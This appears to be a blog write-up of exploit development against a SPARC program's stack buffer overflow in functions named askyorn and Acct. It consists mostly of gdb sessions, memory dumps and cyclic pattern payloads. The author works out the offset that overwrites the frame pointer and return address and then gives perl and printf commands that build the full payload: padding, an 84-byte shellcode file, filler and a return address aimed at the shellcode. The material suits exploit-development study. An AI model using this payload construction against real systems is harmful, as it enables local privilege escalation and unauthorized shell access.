"\x0f\x47\x47\x47\x0f\x48\x48\x48\x0f\x49\x49\x49\x0f\x4a\x4a\x4a"
"\x0f\x4b\x4b\x4b\x0f\x4c\x4c\x4c\x0f\x4d\x4d\x4d\x0f\x4e\x4e\x4e"
"\x0f\x4f\x4f\x4f\x0f\x50\x50\x50\x0f\x51\x51\x51\x0f\x52\x52\x52"
"\x0f\x53\x53\x53\x0f\x54\x54\x54\x0f\x55\x55\x55\x0f\x56\x56\x56"
"\x0f\x57\x57\x57\x0f\x58\x58\x58\x0f\x59\x59\x59\x0f\x5a\x5a\x5a"
"\x10\x41\x41\x41\x10\x42\x42\x42\x10\x43\x43\x43\x10\x44\x44\x44"
"\x10\x45\x45\x45\x10\x46\x46\x46\x10\x47\x47\x47\x10\x48\x48\x48"
"\x10\x49\x49\x49\x10\x4a\x4a\x4a\x10\x4b\x4b\x4b\x10\x4c\x4c\x4c"
"\x10\x4d\x4d\x4d\x10\x4e\x4e\x4e\x10\x4f\x4f\x4f\x10\x50\x50\x50"
"\x10\x51\x51\x51\x10\x52\x52\x52\x10\x53\x53\x53\x10\x54\x54\x54"
"\x10\x55\x55\x55\x10\x56\x56\x56\x10\x57\x57\x57\x10\x58\x58\x58"
"\x10\x59\x59\x59\x10\x5a\x5a\x5a\x11\x41\x41\x41\x11\x42\x42\x42"
"\x11\x43\x43\x43\x11\x44\x44\x44\x11\x45\x45\x45\x11\x46\x46\x46"
"\x11\x47\x47\x47\x11\x48\x48\x48\x11\x49\x49\x49\x11\x4a\x4a\x4a"

Breakpoint 1, 0x00012b28 in askyorn ()
                           (gdb) $ unknown mode: cooked
$ stty
nknown mode: 
$ stty cooked
             $
$ exit
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e014141      0x41014242      0x42014343      0x43014444

One of teh first things I notice.. the buffer start is not word-aligned.. It’s off by 3.. This is because of the ‘n’ that must be present at offset 0… To better account for this: We should write 4 ‘n’ to get back onto a word boundary.

Here we can see after re-aligning the word boundary: ‘nnnn’ + payload:

0xffbef930:     0x6e6e6e6e      0x01414141      0x01424242      0x01434343
0xffbef940:     0x01444444      0x01454545      0x01464646      0x01474747
0xffbef950:     0x01484848      0x01494949      0x014a4a4a      0x014b4b4b
0xffbef960:     0x014c4c4c      0x014d4d4d      0x014e4e4e      0x014f4f4f
0xffbef970:     0x01505050      0x01515151      0x01525252      0x01535353
0xffbef980:     0x01545454      0x01555555      0x01565656      0x01575757
0xffbef990:     0x01585858      0x01595959      0x015a5a5a      0x02414141
0xffbef9a0:     0x02424242      0x02434343      0x02444444      0x02454545
0xffbef9b0:     0x02464646      0x02474747      0x02484848      0x02494949
0xffbef9c0:     0x024a4a4a      0x024b4b4b      0x024c4c4c      0x024d4d4d
0xffbef9d0:     0x024e4e4e      0x024f4f4f      0x02505050      0x02515151
0xffbef9e0:     0x02525252      0x02535353      0x02545454      0x02555555

continuing

(gdb) x/4i $pc
0x12b28 <askyorn+248>:  ret
0x12b2c <askyorn+252>:  restore
0x12b30 <mkpasswd>:     save  %sp, -136, %sp
0x12b34 <mkpasswd+4>:   st  %i0, [ %fp + 0x44 ]
(gdb) si
0x00012b2c in askyorn ()
                        (gdb) 0x00011638 in Acct ()
                                                   (gdb) 0x0001163c in Acct ()
                                                                              (gdb) $ $
$ exit
(gdb) x/96x $sp
0xffbefd40:     0x0b5a5a5a      0x0c414141      0x0c424242      0x0c434343
0xffbefd50:     0x0c444444      0x0c454545      0x0c464646      0x0c474747
0xffbefd60:     0x0c484848      0x0c494949      0x0c4a4a4a      0x0c4b4b4b
0xffbefd70:     0x0c4c4c4c      0x0c4d4d4d      0x0c4e4e4e      0x0c4f4f4f
0xffbefd80:     0x0c505050      0x0c515151      0x0c525252      0x0c535353
0xffbefd90:     0x0c545454      0x0c555555      0x0c565656      0x0c575757
0xffbefda0:     0x0c585858      0x0c595959      0x0c5a5a5a      0x0d414141
0xffbefdb0:     0x0d424242      0x0d434343      0x0d444444      0x0d454545
0xffbefdc0:     0x0d464646      0x0d474747      0x0d484848      0x0d494949
0xffbefdd0:     0x0d4a4a4a      0x0d4b4b4b      0x0d4c4c4c      0x0d4d4d4d
0xffbefde0:     0x0d4e4e4e      0x0d4f4f4f      0x0d505050      0x0d515151
0xffbefdf0:     0x0d525252      0x0d535353      0x0d545454      0x0d555555
0xffbefe00:     0x0d565656      0x0d575757      0x0d585858      0x0d595959
0xffbefe10:     0x0d5a5a5a      0x0e414141      0x0e424242      0x0e434343
0xffbefe20:     0x0e444444      0x0e454545      0x0e464646      0x0e474747
0xffbefe30:     0x0e484848      0x0e494949      0x0e4a4a4a      0x0e4b4b4b
0xffbefe40:     0x0e4c4c4c      0x0e4d4d4d      0x0e4e4e4e      0x0e4f4f4f
0xffbefe50:     0x0e505050      0x0e515151      0x0e525252      0x0e535353
0xffbefe60:     0x0e545454      0x0e555555      0x0e565656      0x0e575757

fp             0xc4e4e4e        0xc4e4e4e
i7             0xc4f4f4f        206524239

now we use my program to get the smash offset:
Of course it will have to take into account the missing 0x0a :(

bazz@life[pts/2][~/latest] ./alternating_payload3 -g 0x0c4e4e4e
-g detected, assuming interactive targetnumbytes = 206458446
1092

1092 + ‘nnnn’ = 1096

# asmshell5_interactive.bin is 84 bytes
perl -e ‘print “nnnnnnnn”;’
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 – 92 = 1004
perl -e ‘print “A”x1004’
printf “\xff\xbe\xfe\x68”
printf “\xff\xbe\xf9\x30” # code will start at 0xffbef938
# return address goes here

1096 bytes to get to the %fp, plus 8 bytes to write fp and i7 = total 1104 bytes

Leave a Reply

Your email address will not be published. Required fields are marked *

*